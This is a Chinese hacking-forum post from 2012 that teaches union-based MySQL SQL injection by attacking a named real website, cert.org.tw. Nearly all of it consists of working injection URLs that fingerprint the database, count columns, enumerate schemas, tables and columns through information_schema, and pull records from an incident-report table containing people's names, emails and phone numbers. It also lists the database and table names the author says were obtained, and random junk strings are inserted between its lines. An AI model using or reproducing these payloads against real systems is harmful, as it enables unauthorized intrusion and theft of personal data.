中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
- T- X0 `* ?; f0 a, ]
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
1 L- f3 M/ F$ X
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
- O/ C& a) [3 z2 j
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
8 s' s& n1 L) J- N. T- h& }% N: L
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
, F8 x3 ?- d8 L- }
4.判断有没有写权限
* i! M( c# j# i4 ^$ G( b! f
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
- G l3 F5 U, F: K2 s) s
没办法,手动猜表啦
0 W) ~5 {4 _5 x9 l
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
" z7 r% x0 W' }, r- a: b8 e
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
6 E8 b3 m& Z+ \- F' x$ v
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
/ B/ V2 e: }( M) k
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
* D& Q: ?' S: z+ J, _+ j
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
5 p. R1 n5 a' u+ y6 h
6.爆表,爆的是twcert库
5 C% K: D- F% W, h
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
% _: R) B( n2 `
爆出如下表
: E8 N" Y3 _# Z6 p
downloadfile,irsys,newsdata,secrpt,secrpt_big5
& f8 x8 e! i6 x4 j
7.爆列名,这次爆的是irsys表
, i/ L. C% i7 L( B! i; z/ K0 d
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
/ D! w# ?3 t& Y, I
爆出如下列
S+ F* v1 G! W, S4 H
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
. E$ }$ H7 k8 T7 x2 Q
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
6 z0 @ U3 X. G0 h$ o: `+ R# Y
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
" D+ [9 r) {' n- w2 d7 m4 k
返回是3,说明每个列里有3个地段
, z1 u7 X! G- Y
9.爆字段内容
, ^7 b1 ~7 w$ p$ N$ h
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
3 n# Z% r2 O. L2 {2 N6 z: X
爆出name列的第一个字段的内容
# v9 r$ {9 y0 r
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
# c6 q2 d1 u6 p% c' `
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2